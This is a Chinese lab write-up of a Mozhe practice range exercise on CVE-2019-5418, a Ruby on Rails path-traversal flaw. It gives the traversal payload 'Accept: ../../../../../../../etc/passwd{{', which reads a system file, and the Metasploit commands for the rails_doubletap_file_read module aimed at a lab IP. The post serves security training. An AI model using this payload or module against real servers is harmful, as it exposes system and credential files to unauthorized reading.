墨者靶场 Ruby On Rails漏洞复现第二题(CVE-2019-5418)

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了墨者靶场 Ruby On Rails漏洞复现第二题(CVE-2019-5418)相关的知识,希望对你有一定的参考价值。

背景介绍

Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。

解题方向

image-20210614192917033

漏洞详情

关于漏洞的相关信息可以查看这篇文章:CVE-2019-5418

通过修改访问控制器的请求包,且会根据用户传入的Accept头来确定文件具体位置。通过Accept: ../../../../来达到路径穿越的目的,然后再通过{{来进行模板查询路径的闭合,使得所要访问的文件被当做外部模板来解析。

影响版本

Rails 全版本

其中修复版本:Rails 6.0.0.beta3,5.2.2.1,5.1.6.2,5.0.7.2,4.2.11.1

一、通过burp读取

访问robots,发现robots.txt被读取出来了

image-20210614195244739

抓包修改 Accept: ../../../../../../../etc/passwd{{

image-20210614195635385

image-20210614195718843

二、利用Metasploit测试漏洞是否存在

查询漏洞是否存在
msf6 > search rails		

image-20210614201908807

使用辅助模块
msf6 > use auxiliary/gather/rails_doubletap_file_read  
查看相关设置
msf6 auxiliary(gather/rails_doubletap_file_read) > show options 

image-20210614202230397

设置IP
msf6 auxiliary(gather/rails_doubletap_file_read) > set rhosts 219.153.49.228
设置端口
msf6 auxiliary(gather/rails_doubletap_file_read) > set RPORT 43581
设置文件地址
msf6 auxiliary(gather/rails_doubletap_file_read) > set ROUTE robots

image-20210614202347334
image-20210614202458696

以上是关于墨者靶场 Ruby On Rails漏洞复现第二题(CVE-2019-5418)的主要内容,如果未能解决你的问题,请参考以下文章

墨者-Ruby On Rails漏洞复现第二题(CVE-2019-5418)

墨者靶场 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

墨者 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

墨者靶场 uWSGI 漏洞复现(CVE-2018-7490)

墨者学院靶场复现(业务逻辑漏洞)

墨者学院靶场复现(业务逻辑漏洞)